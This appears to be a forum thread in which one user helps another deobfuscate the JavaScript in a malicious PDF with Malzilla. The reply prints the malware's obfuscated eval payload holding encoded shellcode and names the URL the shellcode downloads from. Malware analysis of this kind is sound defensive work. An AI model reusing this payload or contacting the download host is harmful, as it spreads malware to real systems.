problem analyze malicious pdf file (contain app.)

[d3t0n4t0r]

Hello,

I've stumbled upon a website that host malicious pdf. I've tried decoding the pdf and there is no hassle on that. However, on the JS part, I wasn't be able to decode on modified spidermonkey js as I got error regarding app function. I've tried several method by making my own function that actually run a print function and etc, but with no result.

I would like to ask favours and pointers on how can i proceed in getting eval log from spidermonkey js.
The malicious pdf is at the post attachment, with password: infected

Thank you in advanced

[SysAdMini]

using Malzilla :

-replace

Code: [Select]

app.rAiDs74Nu6 = viB7XF4GK;
e2comxCBqv = app.setTimeOut("app.rAiDs74Nu6()", 10);
by

Code: [Select]

eval(Yyap('ezi#dyt7ZE8dQu#=#Aoz6("*f5656*f5656*f5656*f9UVY*f664Y*f33X0*f19Y0*f1998*fVU66*fV756*fVYUZ*fV194*fUUVX*fUUUU*f1Y2U*fWU5V*fVUVU*f35VU*fV6ZU*f0U35*f57U6*f0U35*f3VV2*fVU96*fVUVY*f35VU*fY096*f3812*fV8Z8*f9296*fVU88*fVUVU*fZZ33*fY0VY*f2212*f3488*f92V8*fVU8U*fVUVU*fZZ33*fY0V2*fXZ12*f894U*f927W*fVU9W*fVUVU*fZZ33*fY0V6*f9912*f9U78*f921U*fVU6Y*fVUVU*fZZ33*fY0UU*f7V12*f9Z03*f9242*fVU70*fVUVU*fZZ33*fZUUY*fW23U*f0Z7X*f3384*fU2ZZ*fV193*fVUVV*fY8VU*f0Z33*f35XY*fVYZZ*fVV14*f35Y3*fU2YZ*f92Y0*fVU35*fVUVU*f12YU*fU4W0*f0UX9*f2192*fVUVU*f33VU*fU6ZZ*f7Z35*f7U3X*f33YU*fXUZZ*f8912*fVUVU*fYUVU*fZZ35*f14UY*fY3VW*fYZ35*f92U2*fVU1V*fVUVU*fZZVX*f71XU*fY6VU*fX808*f711Z*fVYZU*f1Z02*fVUVU*f0Z89*f35XU*fV6ZZ*fVV14*f35Y3*fU2YZ*fZU92*fVUVU*f14VU*fY2V1*fZZVX*fWXXY*fYX65*f89YX*fXU0Z*fYXYU*fZZ35*f14U6*fY3VZ*fYZ35*f92U2*fVUXX*fVUVU*fVU14*f0Z89*f35XU*fV2ZZ*fVW14*f35Y3*fU2YZ*fUU92*fVUVU*f14VU*f3589*fUUZZ*fVV14*f35Y3*fU2YZ*fVU92*fVUVU*fZVVU*fYWY5*f9VVX*f9VVX*f9VVX*f9VVX*f963X*fY4VY*f35YX*f9W64*fYW81*f9U89*f35YZ*f3596*fV207*fY735*fY0V6*f0X35*f35W6*fU80Y*fVX02*fY08X*f0035*fVXXU*fWX8X*fZ373*f57ZV*f7XVX*fWXY0*fV980*fUU48*f8WW4*fV20Y*f787V*fVXV7*fZU8W*f8V95*f88W5*f0ZY8*fY49Z*f9535*fY435*fVXXY*f1067*fV635*f35Z5*fU6Y4*f67VX*fVY35*fVX35*fY87Z*f7WY7*fVUV2*f8Y92*f8988*fYZ89*fZ6YW*fZ9Z7*fVUZ8*f2531*f2925*f7U6Z*f377U*f3U3U*f273Y*f2338*f7V34*f3U36*f7U3W*f3W25*f7U29*f7U2Z*f2134*f297V*f2931*f316U*f346W*f6421")@'));
- run the script and you'll get the shellcode

-url in shellcode is

Code: [Select]

bookrave.com/tmp/z/ex.php?h=ex5
http://www.virustotal.com/analisis/caf731d52d1e8e7996f85fc89bd345577479e3a6a20f1a4651bcdaeeb426ed6c-1259119437

[d3t0n4t0r]

Thanks for the help.
I've go through the code and found out that I'm just confused as the code itself.
Really appreciate the help

Do you have some tips on handling this kind of obfuscation? or there is no way other than go through the code and understand every component it do?

[SysAdMini]

or there is no way other than go through the code and understand every component it do?

Many scripts can only be analyzed by Malzilla /Spidermonkey if you modify the code.
A  completely automated decoding without modifications works only in rare cases.
In order to modify the code you have to understand the logic behind it.
It's not so difficult with some experience. Obfuscation techniques are often similiar.
If you have some experience, then you look at the code and get an idea how it works quickly.
It's merely a matter of practice.